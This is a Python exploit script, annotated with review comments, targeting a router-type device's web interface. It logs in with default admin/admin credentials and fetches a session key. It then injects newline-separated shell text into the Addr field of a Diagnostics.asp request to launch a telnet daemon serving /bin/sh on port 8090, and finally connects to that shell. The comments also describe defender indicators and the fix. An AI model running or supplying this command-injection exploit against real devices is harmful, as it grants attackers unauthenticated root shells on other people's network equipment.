import
requests
import
urllib
import
os
from
time
import
sleep
from
urllib.parse
import
unquote
# Target host and base URL are hard-coded literals (no argument parsing).
# The scheme is plain http:// on port 80, so everything sent below — including
# the credentials embedded in the login URL — travels in clear text.
server = "192.168.1.1"
main_url = "http://192.168.1.1:80"
# Browser-like User-Agent attached to every request made in this file.
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36",
}
def login():
    """Send one GET to Login.asp with credentials carried in the query string.

    The username/password pair and a fixed `_` value are part of the URL
    literal, so they appear in server, proxy and shell-history logs and are
    sent unencrypted over the http:// base URL.  The Session created here is
    local to the function and is dropped on return, so any cookie the device
    sets in reply is not reused by the later requests in this file.  Nothing
    is returned and the status code is not checked; the body is only printed.
    """
    s = requests.Session()
    # Certificate verification is disabled.  It has no effect for the
    # http:// main_url, but would silently accept any certificate if the
    # scheme were ever switched to https://.
    s.verify = False
    url = main_url + "/cgi-bin/Login.asp?User=admin&Pwd=admin&_=1690122728925"
    resp = s.get(url, headers=headers, timeout=10)
    print(resp.text)
def get_session_key():
    """Fetch get_sessionKey.asp and return its raw response body.

    Returns:
        The response text exactly as received — no parsing, trimming or
        status check, so an error page or empty body is returned just like
        a real key.  The body is also echoed to stdout.

    NOTE(review): a fresh Session is used, so whatever cookie login() may have
    obtained is not presented here.  If the device answers this request with
    a usable key anyway, it is handing it out to an unauthenticated client —
    worth confirming against the device and, if so, reporting as a finding.
    """
    s = requests.Session()
    # See login(): verify=False is inert over http:// but unsafe over https://.
    s.verify = False
    url = main_url + "/cgi-bin/get/New_GUI/get_sessionKey.asp"
    resp = s.get(url, headers=headers, timeout=10)
    sessionKey = resp.text
    print(sessionKey)
    return sessionKey
def exp(sessionKey=None):
    """POST to Diagnostics.asp with an `Addr` value that contains newline characters.

    Args:
        sessionKey: string placed in the `sessionKey` form field after
            urllib.parse.unquote().  The default None is not usable:
            unquote(None) raises TypeError, so callers must pass a str.

    The `Addr` field presumably exists to carry a host address for a
    diagnostic (ping/traceroute-style) action; here it carries `%0a`-encoded
    line breaks around shell text, i.e. the request only "works" if the
    device hands `Addr` to a shell without validating it.  From a defender's
    point of view the indicator is a POST to
    /cgi-bin/New_GUI/Set/Diagnostics.asp whose `Addr` value contains control
    characters or anything that is not a hostname/IP; the device-side fix is
    to validate `Addr` as an address before use and never interpolate it into
    a shell command.  Nothing is returned; only the response body is printed.
    """
    cmd = "%0autelnetd -p 8090 -l /bin/sh%0a"
    s = requests.Session()
    # See login(): verify=False is inert over http:// but unsafe over https://.
    s.verify = False
    # `urllib.parse` is reachable through the bare `import urllib` only because
    # `from urllib.parse import unquote` at the top of the file already loaded
    # the submodule.  unquote() turns the %0a sequences into real LF bytes and
    # is applied to sessionKey as well, so a key containing %-escapes is
    # decoded before being sent back.
    params = {
        "Type": "p",
        "sessionKey": urllib.parse.unquote(sessionKey),
        "Addr": urllib.parse.unquote(cmd),
    }
    url = main_url + "/cgi-bin/New_GUI/Set/Diagnostics.asp"
    # timeout=100000 seconds — effectively waits indefinitely for a reply.
    resp = s.post(url, data=params, headers=headers, timeout=100000)
    print(resp.text)
if __name__ == '__main__':
    # Fixed sequence: login -> fetch session key -> Diagnostics POST ->
    # 3 s pause -> interactive telnet client to port 8090 via the system
    # shell.  Each step prints a banner and no step checks the outcome of the
    # previous one, so the telnet attempt runs even if an earlier request
    # failed or returned an error page.
    print("\n[*] Connection ", main_url);
    login()
    print("[*] Getting session key")
    sessionKey = get_session_key()
    print("[*] Sending payload")
    exp(sessionKey=sessionKey)
    print("[*] Running Telnetd Service")
    print("[*] Opening Telnet Connection\n")
    sleep(3)
    # os.system() runs a shell-built string; `server` is a module constant
    # here, so no external input reaches the shell, but the pattern would
    # become an injection point if `server` were ever read from user input.
    os.system('telnet ' + str(server) + ' 8090')